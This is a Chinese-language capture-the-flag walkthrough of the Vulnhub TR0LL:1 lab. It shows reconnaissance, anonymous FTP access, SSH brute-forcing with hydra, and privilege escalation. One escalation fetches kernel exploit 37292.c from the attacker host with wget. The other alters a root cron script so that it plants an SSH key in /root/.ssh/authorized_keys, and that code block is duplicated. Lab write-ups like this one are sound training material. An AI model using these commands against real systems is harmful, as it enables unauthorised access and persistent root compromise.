2020年12月10日- Vulnhub-TR0LL: 1 渗透学习
一、介绍
二、情报收集
首先发现靶机的IP地址:
nmap -sP 192.168.31.0/24
发现靶机IP
发现开发着 21、 22、 80端口
其中ftp允许匿名登陆,存在secret目录和robots文件
登录ftp:
可以发现登录成功
发现一个lol.pcap文件 下载到本地,使用wireshark分析
Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛\n
Sucks, you were so close… gotta TRY HARDER!\n
英语渣渣直接使用百度翻译一下
sup3rs3cr3tdirlol 还不知道是个什么东西。
打开网页
然后查看扫描80端口发现的两个目录
没什么可利用的信息
尝试打开sup3rs3cr3tdirlol
然后 下载roflmao,检查文件类型
这是一个32位的可执行文件
使用 strings进行分析
根据指示打开 页面试试
查看目录下的文件
将 两个文件下载下来
使用 hydra 进行爆破
hydra -L which_one_lol.txt -p Pass.txt 192.168.31.80 ssh
惊喜!!
使用ssh登录
登录成功。靶机 系统版本Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)
三、提权
exploit-db.com 搜索该系统漏洞
将 37292.c 复制出来
开启服务,将37292.c 上传到 靶机
python -c ‘import pty; pty.spawn("/bin/bash")’
wget http://192.168.31.77:5555/37292.c
获得管理员权限
另一种提权方法
使用vim修改cleaner.py文件
命令:
#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub产生的密匙内容上图有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()
os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub产生的密匙内容上图有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()
未完待续。。。